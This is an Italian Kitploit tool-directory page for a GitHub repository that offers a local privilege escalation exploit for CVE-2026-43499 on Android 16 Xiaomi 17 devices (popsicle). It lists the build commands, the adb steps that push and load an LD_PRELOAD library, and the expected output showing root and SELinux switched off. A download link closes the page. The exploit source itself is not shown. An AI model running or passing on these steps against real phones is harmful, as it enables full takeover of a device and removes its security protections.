Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-43499-popsicle — Implementazione per 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k | Kitploit
Strumenti/GitHubGitHub/x-spy/cve-2026-43499-popsicle
Sicurezza AndroidEscalation di PrivilegiAnalisi delle VulnerabilitàExploitSicurezza MobileBinary Exploitation
GitHubx-spy/cve-2026-43499-popsicle

CVE-2026-43499-popsicle

Implementazione per 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k

Vedi Repository
2198181 mese faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-43499 per popsicle

Questo repository contiene un'implementazione di escalation dei privilegi locale per Android 16 su Xiaomi 17 Pro Max (popsicle). Kernel verificato:

root@kitploit:~
6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k

La serie Xiaomi 17, Pro e Ultra con questo kernel è stata verificata come pienamente funzionante.

Generazione del target

Dipende da Python 3 e llvm-objdump:

root@kitploit:~
python3 generate_target.py \
  --boot boot.img \
  --xbl-config xbl_config.img \
  -o source/src/target.h

Compilazione

root@kitploit:~
make -C source clean preload

Quando l'NDK non viene rilevato automaticamente:

root@kitploit:~
NDK_ROOT=/path/to/android-ndk make -C source clean preload

Prodotto finale:

root@kitploit:~
source/build/bin/preload.so

Esecuzione

root@kitploit:~
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'

In caso di successo si può osservare:

root@kitploit:~
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
direct-root-summary root=1 id=1 su=1/... selinux=1->0 uid=0 euid=0 gid=0 egid=0

A exploit completato è possibile accendere lo schermo, sbloccare e accedere alla schermata principale, ma le app Android appena avviate non riescono a completare l'inizializzazione del Framework e vanno in crash; dopo un riavvio l'avvio delle app torna normale.

Scarica lo strumento